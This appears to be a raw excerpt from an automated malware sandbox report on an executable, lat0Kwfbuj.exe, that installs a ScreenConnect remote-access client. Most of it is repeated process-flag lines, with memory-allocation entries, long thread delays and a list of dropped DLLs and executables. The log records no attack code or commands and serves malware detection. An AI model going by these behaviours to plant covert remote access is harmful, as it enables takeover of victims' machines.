                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 4C60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 6460000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 5BD0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 7460000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 8460000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 86F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 6460000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeMemory allocated: 96F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 2040000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 1E50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1A6A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1AFA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI888B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8C55.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
